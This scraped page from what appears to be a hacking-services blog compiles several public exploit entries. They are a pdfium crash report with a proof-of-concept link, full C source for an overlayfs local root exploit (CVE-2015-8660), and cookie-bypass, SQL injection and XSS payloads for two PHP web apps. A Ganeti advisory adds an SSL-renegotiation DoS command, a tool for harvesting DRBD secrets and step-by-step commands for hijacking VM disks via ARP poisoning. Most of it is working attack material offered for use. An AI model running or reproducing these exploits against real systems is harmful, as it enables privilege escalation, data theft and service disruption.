Source: https://code.google.com/p/google-security-research/issues/detail?id=612
The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
--- cut ---
$ ./pdfium_test asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8
Rendering PDF file asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8.
Non-linearized path...
=================================================================
==22207==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b7edb84 at pc 0x000000d6f064 bp 0x7ffc8b7ed8c0 sp 0x7ffc8b7ed8b8
READ of size 4 at 0x7ffc8b7edb84 thread T0
#0 0xd6f063 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9
#1 0xd6ecd2 in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:808:3
#2 0xd6f6a7 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:902:3
#3 0xedbc22 in DrawFuncShading(CFX_DIBitmap*, CFX_Matrix*, CPDF_Dictionary*, CPDF_Function**, int, CPDF_ColorSpace*, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:293:15
#4 0xeda3c0 in CPDF_RenderStatus::DrawShading(CPDF_ShadingPattern*, CFX_Matrix*, FX_RECT&, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:875:7
#5 0xee45b9 in CPDF_RenderStatus::ProcessShading(CPDF_ShadingObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:954:3
#6 0xe6700d in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:399:14
#7 0xe61f6d in CPDF_RenderStatus::RenderSingleObject(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:292:3
#8 0xe618c1 in CPDF_RenderStatus::RenderObjectList(CPDF_PageObjects const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:269:5
#9 0xe6bc26 in CPDF_RenderStatus::ProcessForm(CPDF_FormObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:485:3
#10 0xe6704c in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:402:14
#11 0xe67f47 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:330:3
#12 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
#13 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
#14 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
#15 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
#16 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
#17 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
#18 0x4f16e9 in main samples/pdfium_test.cc:608:5
Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
#0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795
This frame has 2 object(s):
[32, 36) 'input' <== Memory access at offset 36 overflows this variable
[48, 52) 'nresults'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
Shadow bytes around the buggy address:
0x1000116f5b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5b60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x1000116f5b70:[04]f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000116f5bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22207==ABORTING
--- cut ---
While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39165.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863114971
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
just another overlayfs exploit, works on kernels before 2015-12-26
# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660
blah@ubuntu:~$ id
uid=1001(blah) gid=1001(blah) groups=1001(blah)
blah@ubuntu:~$ uname -a && cat /etc/issue
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
blah@ubuntu:~$ ./overlayfail
root@ubuntu:~# id
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)
12/2015
by rebel
6354b4e23db225b565d79f226f2e49ec0fe1e19b
*/
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#include <sys/wait.h>
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
system("rm -rf /tmp/haxhax");
mkdir("/tmp/haxhax", 0777);
mkdir("/tmp/haxhax/w", 0777);
mkdir("/tmp/haxhax/u",0777);
mkdir("/tmp/haxhax/o",0777);
if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
fprintf(stderr,"mount failed..\n");
}
chmod("/tmp/haxhax/w/work",0777);
chdir("/tmp/haxhax/o");
chmod("bash",04755);
chdir("/");
umount("/tmp/haxhax/o");
return 0;
}
int
main(int argc, char **argv)
{
int status;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;
struct stat s;
if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");
if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}
waitpid(pid, &status, 0);
}
waitpid(init, &status, 0);
return 0;
}
usleep(300000);
wait(NULL);
stat("/tmp/haxhax/u/bash",&s);
if(s.st_mode == 0x89ed)
execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
fprintf(stderr,"couldn't create suid :(\n");
return -1;
}
Exploit Title : Online Airline Booking System multiple vulnerabilities
Author : WICS
Date : 05/1/2016
Software Link : http://sourceforge.net/projects/oabs/
Affected Version: All
Overview:
The Online Airline Booking System is designed to be an all in one solution for an airline wishing to speed up and save money compared to a traditional booking system. It consists simply of a server-side web application combined powerful backend database to provide the user with a highly accessible system
1. Authentication Bypass
Vulnerability exist in admin panel authentication mechanism due to use of $_COOKIE['LoggedIn'] , as $_COOKIE variable can be manipulated by user
so any user can login to admin panel without knowing username password
line no. 2 if(!isset($_COOKIE['LoggedIn'])) die("You are not logged in!");
Just set cookie value LoggedIn=yes in request header and web application will let you login.
like this
Cookie: LoggedIn=yes
2. Application Reinstallation
install.php is the page which can be used for application reinstallation.
open link
application/install.php
a form will appear, first text field is for new admin username and second field is for new password of web application
proceed with installation and web application will setup with new attacker supplied admin username password
Exploit Title : Multiple Vulnerabilities in Simple PHP Polling System.
Author : WICS
Date : 05-Jan-2016
Software Link : http://sourceforge.net/projects/pollingsystem/
# Overview :
Simple PHP Polling System helps organizations to make polls of different types of positions with a number of candidates under each position.
This vulnerable package ha 5869+ downlaods till the date.
Multiple vulnerabilities ( SQL insertion injection, Persistent Cross Site Scripting, Password Reset. )
1. SQL injection : Sql injetion exist in following pages :
--------------
a) manage-profile.php : In manage-profile.php there is no filteration or validation for user supplied data, on parameter " $_POST['email']
line no.33 -> $myEmail = $_POST['email'];
...
...
...
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" ) or die( mysql_error() );
an attacker can inject post parameter email to perform SQL Injecton attack.
b) registeracc.php : In registeracc.php there is no filteration or validation for user supplied data, on parameter " $_POST['email']
line no.26 -> $myEmail = $_POST['email'];
...
...
...
line no 30 -> $sql = mysql_query( "INSERT INTO tbMembers(first_name, last_name, email, password) VALUES ('$myFirstName','$myLastName', '$myEmail', '$newpass')" )
or die( mysql_error() );
an attacker can inject post parameter email to perform SQL Injecton attack.
# PoC : firstname=WICS&lastname=tester&email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or'&password=password&ConfirmPassword=password&submit=Register+Account
2. Password reset :
---------------
In manage-profile.php page,
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )
By changing the value of 'member_id' attacker can reset the user details including his password.
steps to reproduce :
1. Login into your account.
2. Navagate to Manage My Profile.
Request will be something like - http://localhost/vote/manage-profile.php?id= somenumber
here the value of id will be id of victim, and value of rest of the post parameter will set by attacker.
# PoC : firstname=Attacker&lastname=LastNmae&email=Tester%40wics.com&password=adminadmin&ConfirmPassword=adminadmin&update=Update+Profile
3. Persistent Cross site Scripting : In 'registeracc.php' and 'manage-profile.php' page the value of post parameter ' email ' supplied by user is not being ----------------------------------- validated .this leaves application vulnerable to persistent Cross Site Scripting.
# PoC : firstname=WICS&lastname=wics&email=<script>alert(document.location)</script>&password=admin&ConfirmPassword=admin&update=Update+Profile
=begin
## Advisory Information
Title: Ganeti Security Advisory (DoS, Unauthenticated Info Leak)
Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
Date published: 2016-01-05
Vendors contacted: Google, MITRE
Organization contacted: Riseup
Release mode: Released
CVE: CVE-2015-7944, CVE-2015-7945
CNNVD: no current CNNVD
## Product Description
Ganeti is a virtual machine cluster management tool developed by Google.
The solution stack uses either Xen or KVM as the virtualization
platform, LVM for disk management,
and optionally DRBD for disk replication across physical hosts.
## Vulnerabilities Summary
Ganeti has security problems in the default install (with DRBD) and
the default configuration due to old libraries and design problem,
even if the security level in Ganeti seems to be high.
These problems affect every versions until the last released version.
The Ganeti API Daemon is open on every interface by default and an
attacker can DoS this daemon.
It is also possible to abuse this deamon to retrieve information, such
as network topology, DRBD secrets...
A PoC is provided to automaticaly retrieve sensitive information and
a possible scenario, allowing to take over Virtual Machines remotely,
is provided (which worked in my lab in certain conditions).
## Details - CVE-2015-7944 - Unauthenticated Remote DoS
Ganeti is prone to a SSL DoS with SSL renegociation against the RAPI Daemon:
user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client
-connect 10.105.1.200:5080
CONNECTED(00000003)
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
- ---
Certificate chain
0 s:/CN=ganeti.example.com
i:/CN=ganeti.example.com
- ---
Server certificate
- -----BEGIN CERTIFICATE-----
[...]
- -----END CERTIFICATE-----
subject=/CN=ganeti.example.com
issuer=/CN=ganeti.example.com
- ---
No client certificate CA names sent
- ---
SSL handshake has read 1003 bytes and written 625 bytes
- ---
New, TLSv1/SSLv3, Cipher is AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1.2
Cipher : AES256-GCM-SHA384
Session-ID: D75BCF369143CD008D693B022B967149AF0BD420DE385C51227A1921CD29360D
Session-ID-ctx:
Master-Key:
7DDD57FD479AE6555D1D42CF2B15B8857C28430189EC5C1331C75C4253E4A9F0FC0672EE2F2438CD055328C5A46C4F5F
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - 10 ad 69 39 76 6c 2e 37-cf e7 c2 2c 5f f0 e0 20 ..i9vl.7...,_..
0010 - 5d 85 5a 79 82 20 6a 1d-f1 6e 51 f5 f2 f7 c6 cf ].Zy. j..nQ.....
0020 - c1 85 2d 42 5a 1c 53 b4-cb db de 65 04 2a 02 da ..-BZ.S....e.*..
0030 - 5c 7d 82 ef 56 4a a4 a1-88 bd 87 fd af 25 e3 2e \}..VJ.......%..
0040 - 28 68 04 a4 01 22 88 72-30 0b 79 1c 75 61 88 d5 (h...".r0.y.ua..
0050 - c9 f3 e2 0b 02 50 bf c8-29 ac d9 36 f3 76 bd 8b .....P..)..6.v..
0060 - 05 e0 d3 a9 f3 8b 8b 11-ef 19 2f 94 92 30 94 58 ........../..0.X
0070 - aa 64 ba 3f a4 fc 15 4b-74 11 3b c3 c7 e7 d4 33 .d.?...Kt.;....3
0080 - dd 76 e9 e1 1b 3a 95 c4-50 28 4f 9e bc cc cb f3 .v...:..P(O.....
0090 - bf 4d 60 92 64 00 af 67-c0 e9 69 e3 98 54 21 dc .M`.d..g..i..T!.
Start Time: 1438121399
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
- ---
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
[...]
- From my test, 1 thread takes 75% of CPU.
`top` on the main server (10.105.1.200):
19734 gnt-rapi 20 0 148980 35364 4696 R 76.8 3.7 0:04.12
ganeti-rapi
Multiple threads will eat all the available CPUs and will likely DoS ganeti:
21280 gnt-rapi 20 0 148980 35364 4696 R 35.3 3.7 0:05.06
ganeti-rapi
20968 gnt-rapi 20 0 148980 35364 4696 R 33.4 3.7 0:09.92
ganeti-rapi
20969 gnt-rapi 20 0 148980 35364 4696 R 32.4 3.7 0:09.95
ganeti-rapi
21282 gnt-rapi 20 0 148980 35364 4696 R 32.4 3.7 0:04.53
ganeti-rapi
21281 gnt-rapi 20 0 148980 35364 4696 R 31.4 3.7 0:04.78
ganeti-rapi
An attacker can use tools from THC to perform SSL DoS too (openssl was
the fastest solution out of the box):
https://www.thc.org/thc-ssl-dos/
## Details - CVE-2015-7945 - Unauthenticated Remote Information Disclosure
This vulnerability allows an attacker to retrieve data using
information disclosure,
allowing him, depending on the configuration, to remotely hack VMs.
A PoC (GHETTO-BLASTER which works in Linux (Debian, Kali) and FreeBSD)
is provided as a base64-encoded file to this email.
This PoC is also available here:
https://pierrekim.github.io/advisories/GHETTO-BLASTER.
I. Design Security Problem with the RAPI Daemon
In the Ganeti master node, when using /usr/sbin/gnt-network, a
non-root user can't get information (debian-01 is the ganeti master
node):
user@debian-01:~$ /usr/sbin/gnt-network list
It seems you don't have permissions to connect to the master daemon.
Please retry as a different user.
user@debian-01:~$
This is common for all gnt-tools and seems to be a security design.
It appears Genati by default is too open when using the RAPI daemon
and this daemon listens on every interface by default.
For example, the network configuration can be extracted from jobs
using the RAPI daemon without authentication.
I wrote a tool, "GHETTO-BLASTER", to industrialize the process:
user@kali:~$ ./GHETTO-BLASTER http://<ip_of_ganeti_rapi>
Example:
https://<ip>
2015 Pierre Kim <pierre.kim.sec@gmail.com>
@PierreKimSec https://pierrekim.github.io
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
<http://www.wtfpl.net/txt/copying/>
user@kali:~$ ./GHETTO-BLASTER http://10.105.1.200
[...]
[a lot of output]
[...]
user@kali:~$ ls -l 2-networks 2-networks-test-priv 2-networks-test-pub
-rw-r--r-- 1 user user 228 Jun 20 13:37 2-networks
-rw-r--r-- 1 user user 882 Jun 20 13:37 2-networks-test-priv
-rw-r--r-- 1 user user 881 Jun 20 13:37 2-networks-test-pub
user@kali:~$ cat 2-networks 2-networks-test-priv 2-networks-test-pub
$VAR1 = [
{
'name' => 'test-priv',
'uri' => '/2/networks/test-priv'
},
{
'uri' => '/2/networks/test-pub',
'name' => 'test-pub'
}
];
$VAR1 = {
'mtime' => '1333027652.67126',
'gateway' => undef,
'network6' => undef,
'inst_list' => [],
'mac_prefix' => undef,
'serial_no' => 1,
'free_count' => 254,
'name' => 'test-priv',
'map' =>
'X..............................................................................................................................................................................................................................................................X',
'gateway6' => undef,
'external_reservations' => '192.168.1.0, 192.168.1.255',
'uuid' => '506ad97b-2276-43f4-ae27-e6bbb97f28ff',
'ctime' => '1333027652.67126',
'reserved_count' => 2,
'network' => '192.168.1.0/24',
'group_list' => [],
'tags' => []
};
$VAR1 = {
'mac_prefix' => undef,
'inst_list' => [],
'network6' => undef,
'mtime' => '1333027641.64375',
'gateway' => undef,
'map' =>
'X..............................................................................................................................................................................................................................................................X',
'free_count' => 254,
'name' => 'test-pub',
'serial_no' => 1,
'reserved_count' => 2,
'network' => '192.168.0.0/24',
'ctime' => '1333027641.64375',
'gateway6' => undef,
'uuid' => '48b34199-2d23-46f0-b4aa-2539cb4a7780',
'external_reservations' => '192.168.0.0, 192.168.0.255',
'group_list' => [],
'tags' => []
};
user@kali:~$
It's possible to map the network and to retrieve sensible secrets.
Other interesting information:
osparams_secret is readable in jobs using the access to RAPI.
II. Using this information disclosure to hack VMs:
By default, /var/lib/ganeti/config.data(640, gnt-masterd:gnt-confd)
contains the secret key for DRBD replication.
A remote user or even a local non-root (or non gnt-masterd user) can't
get the configuration of DRBD.
This key can be extracted from jobs by abusing the RAPI daemon without
authentication.
After running GHETTO-BLASTER, you will have a lot of files:
user@kali:~$ ls
1-list-collectors 2-jobs-121 2-jobs-154
2-jobs-187 2-jobs-219 2-jobs-251 2-jobs-284 2-jobs-47 2-jobs-8
1-report-all 2-jobs-122 2-jobs-155
2-jobs-188 2-jobs-22 2-jobs-252 2-jobs-285 2-jobs-48 2-jobs-80
2-features 2-jobs-123 2-jobs-156
2-jobs-189 2-jobs-220 2-jobs-253 2-jobs-286 2-jobs-49 2-jobs-81
2-info 2-jobs-124 2-jobs-157
2-jobs-19 2-jobs-221 2-jobs-254 2-jobs-287 2-jobs-5 2-jobs-82
2-instances 2-jobs-125 2-jobs-158
2-jobs-190 2-jobs-222 2-jobs-255 2-jobs-288 2-jobs-50 2-jobs-83
2-instances-vm-01 2-jobs-126 2-jobs-159
2-jobs-191 2-jobs-223 2-jobs-256 2-jobs-289 2-jobs-51 2-jobs-84
2-instances-vm-01-info-jobs 2-jobs-127 2-jobs-16
2-jobs-192 2-jobs-224 2-jobs-257 2-jobs-29 2-jobs-52 2-jobs-85
2-instances-vm-02.example.com 2-jobs-128 2-jobs-160
2-jobs-193 2-jobs-225 2-jobs-258 2-jobs-290 2-jobs-53 2-jobs-86
2-instances-vm-02.example.com-info-jobs 2-jobs-129 2-jobs-161
2-jobs-194 2-jobs-226 2-jobs-259 2-jobs-291 2-jobs-54 2-jobs-87
2-jobs 2-jobs-13 2-jobs-162
2-jobs-195 2-jobs-227 2-jobs-26 2-jobs-292 2-jobs-55 2-jobs-88
2-jobs-0 2-jobs-130 2-jobs-163
2-jobs-196 2-jobs-228 2-jobs-260 2-jobs-293 2-jobs-56 2-jobs-89
2-jobs-1 2-jobs-131 2-jobs-164
2-jobs-197 2-jobs-229 2-jobs-261 2-jobs-294 2-jobs-57 2-jobs-9
2-jobs-10 2-jobs-132 2-jobs-165
2-jobs-198 2-jobs-23 2-jobs-262 2-jobs-295 2-jobs-58 2-jobs-90
2-jobs-100 2-jobs-133 2-jobs-166
2-jobs-199 2-jobs-230 2-jobs-263 2-jobs-296 2-jobs-59 2-jobs-91
2-jobs-101 2-jobs-134 2-jobs-167
2-jobs-2 2-jobs-231 2-jobs-264 2-jobs-297 2-jobs-6 2-jobs-92
2-jobs-102 2-jobs-135 2-jobs-168
2-jobs-20 2-jobs-232 2-jobs-265 2-jobs-298 2-jobs-60 2-jobs-93
2-jobs-103 2-jobs-136 2-jobs-169
2-jobs-200 2-jobs-233 2-jobs-266 2-jobs-299 2-jobs-61 2-jobs-94
2-jobs-104 2-jobs-137 2-jobs-17
2-jobs-201 2-jobs-234 2-jobs-267 2-jobs-3 2-jobs-62 2-jobs-95
2-jobs-105 2-jobs-138 2-jobs-170
2-jobs-202 2-jobs-235 2-jobs-268 2-jobs-30 2-jobs-63 2-jobs-96
2-jobs-106 2-jobs-139 2-jobs-171
2-jobs-203 2-jobs-236 2-jobs-269 2-jobs-31 2-jobs-64 2-jobs-97
2-jobs-107 2-jobs-14 2-jobs-172
2-jobs-204 2-jobs-237 2-jobs-27 2-jobs-32 2-jobs-65 2-jobs-98
2-jobs-108 2-jobs-140 2-jobs-173
2-jobs-205 2-jobs-238 2-jobs-270 2-jobs-33 2-jobs-66 2-jobs-99
2-jobs-109 2-jobs-141 2-jobs-174
2-jobs-206 2-jobs-239 2-jobs-271 2-jobs-34 2-jobs-67 2-networks
2-jobs-11 2-jobs-142 2-jobs-175
2-jobs-207 2-jobs-24 2-jobs-272 2-jobs-35 2-jobs-68 2-nodes
2-jobs-110 2-jobs-143 2-jobs-176
2-jobs-208 2-jobs-240 2-jobs-273 2-jobs-36 2-jobs-69
2-nodes-debian-01
2-jobs-111 2-jobs-144 2-jobs-177
2-jobs-209 2-jobs-241 2-jobs-274 2-jobs-37 2-jobs-7
2-nodes-debian-01-role
2-jobs-112 2-jobs-145 2-jobs-178
2-jobs-21 2-jobs-242 2-jobs-275 2-jobs-38 2-jobs-70
2-nodes-debian-02
2-jobs-113 2-jobs-146 2-jobs-179
2-jobs-210 2-jobs-243 2-jobs-276 2-jobs-39 2-jobs-71
2-nodes-debian-02-role
2-jobs-114 2-jobs-147 2-jobs-18
2-jobs-211 2-jobs-244 2-jobs-277 2-jobs-4 2-jobs-72 2-os
2-jobs-115 2-jobs-148 2-jobs-180
2-jobs-212 2-jobs-245 2-jobs-278 2-jobs-40 2-jobs-73 version
2-jobs-116 2-jobs-149 2-jobs-181
2-jobs-213 2-jobs-246 2-jobs-279 2-jobs-41 2-jobs-74
2-jobs-117 2-jobs-15 2-jobs-182
2-jobs-214 2-jobs-247 2-jobs-28 2-jobs-42 2-jobs-75
2-jobs-118 2-jobs-150 2-jobs-183
2-jobs-215 2-jobs-248 2-jobs-280 2-jobs-43 2-jobs-76
2-jobs-119 2-jobs-151 2-jobs-184
2-jobs-216 2-jobs-249 2-jobs-281 2-jobs-44 2-jobs-77
2-jobs-12 2-jobs-152 2-jobs-185
2-jobs-217 2-jobs-25 2-jobs-282 2-jobs-45 2-jobs-78
2-jobs-120 2-jobs-153 2-jobs-186
2-jobs-218 2-jobs-250 2-jobs-283 2-jobs-46 2-jobs-79
Files contain DRBD secrets:
user@kali:~$ grep secret *|tail -n 5
2-jobs-80:
'secret' =>
'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-82:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-84:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-85:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-86:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
user@kali:~$
The key is confirmed by using `drbdsetup show` as root in the Ganeti
master node:
root@debian-01:~# drbdsetup show
resource resource0 {
options {
}
net {
cram-hmac-alg "md5";
shared-secret "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
after-sb-0pri discard-zero-changes;
after-sb-1pri consensus;
}
_remote_host {
address ipv4 10.105.1.201:11000;
}
_this_host {
address ipv4 10.105.1.200:11000;
volume 0 {
device minor 0;
disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
disk {
size 8388608s; # bytes
resync-rate 61440k; # bytes/second
}
}
}
}
root@debian-01:~#
By digging more, one of the jobs file (2-jobs-280) contains the DRDB
configuration:
[...]
'drbd_info' => {
'port' => 11000,
'primary_minor' => 0,
'secondary_node' => 'debian-02',
'secondary_minor' => 0,
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
'primary_node' => 'debian-01'
},
[...]
As stated in http://docs.ganeti.org/ganeti/current/html/security.html:
DRBD connections are protected from erroneous connections to other
machines (as may happen due to software issues), and
from accepting connections from other machines, by using a shared
secret, exchanged via RPC requests from the master to the nodes when
configuring the device.
We recovered the secret of DRBD, the port used and the nodes without
authentication.
Other files contain the LVM VG and the LVM LG names! It's enough to
start playing with DRDB from an attacker side.
III. DRBD Madness
Now, it's time for DRBD Feng Shui!
Getting the File System of a VM:
o By doing ARP spoofing in the same LAN:
We will impersonate 10.105.1.201 by doing ARP poisoning and using a
valid drbd.conf thank to the parameters provided by the RAPI daemon:
root@kali# cat etc-drbd.conf
include "drbd.d/global_common.conf";
include "drbd.d/*.res";
resource resource0 {
volume 0 {
device minor 0;
disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
}
protocol C;
net {
cram-hmac-alg "md5";
shared-secret "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
after-sb-0pri discard-zero-changes;
after-sb-1pri consensus;
}
on target {
address 10.105.1.200:11000;
}
on kali {
address 10.105.1.201:11000;
}
}
root@kali# vgremove xenvg-vg 2>/dev/null
root@kali# dd if=/dev/zero of=/dev/sdb bs=1024 count=1024
root@kali# pvcreate /dev/sdb
root@kali# vgcreate xenvg-vg /dev/sdb
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data --size 4G xenvg-vg
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta --size 128M xenvg-vg
root@kali# cp etc-drbd.conf /etc/drbd.conf
root@kali# drbdadm create-md resource0
root@kali# drbdadm up resource0
<ARP poisoning> || root@kali# ifconfig eth0 10.105.1.201 netmask 255.255.255.0
root@kali# drbdadm attach resource0
root@kali# drbdadm connect resource0
root@kali# cat /proc/drbd
version: 8.4.3 (api:1/proto:86-101)
srcversion: 1A9F77B1CA5FF92235C2213
0: cs:SyncTarget ro:Secondary/Primary ds:Inconsistent/UpToDate C r-----
ns:0 nr:916568 dw:916472 dr:0 al:0 bm:55 lo:2 pe:0 ua:2 ap:0 ep:1
wo:f oos:3277832
[===>................] sync'ed: 22.0% (3277832/4194304)K
finish: 0:08:33 speed: 6,368 (5,912) want: 4,520 K/sec
root@kali# echo "wow synchronisation in progress !"
wow synchronisation in progress !
root@kali#
After 10min of synchronisation, an attacker will have a perfect copy
of the targeted VM File System using DRDB replication.
It's also possible to write information in the File System (like
adding SSH keys).
Rooting VMs by adding ssh keys and by doing s/PermitRootLogin
No/PermitRootLogin Yes/ is left as a exercise to the reader.
o Other methods of MiTM exist and are left as a exercise for the reader.
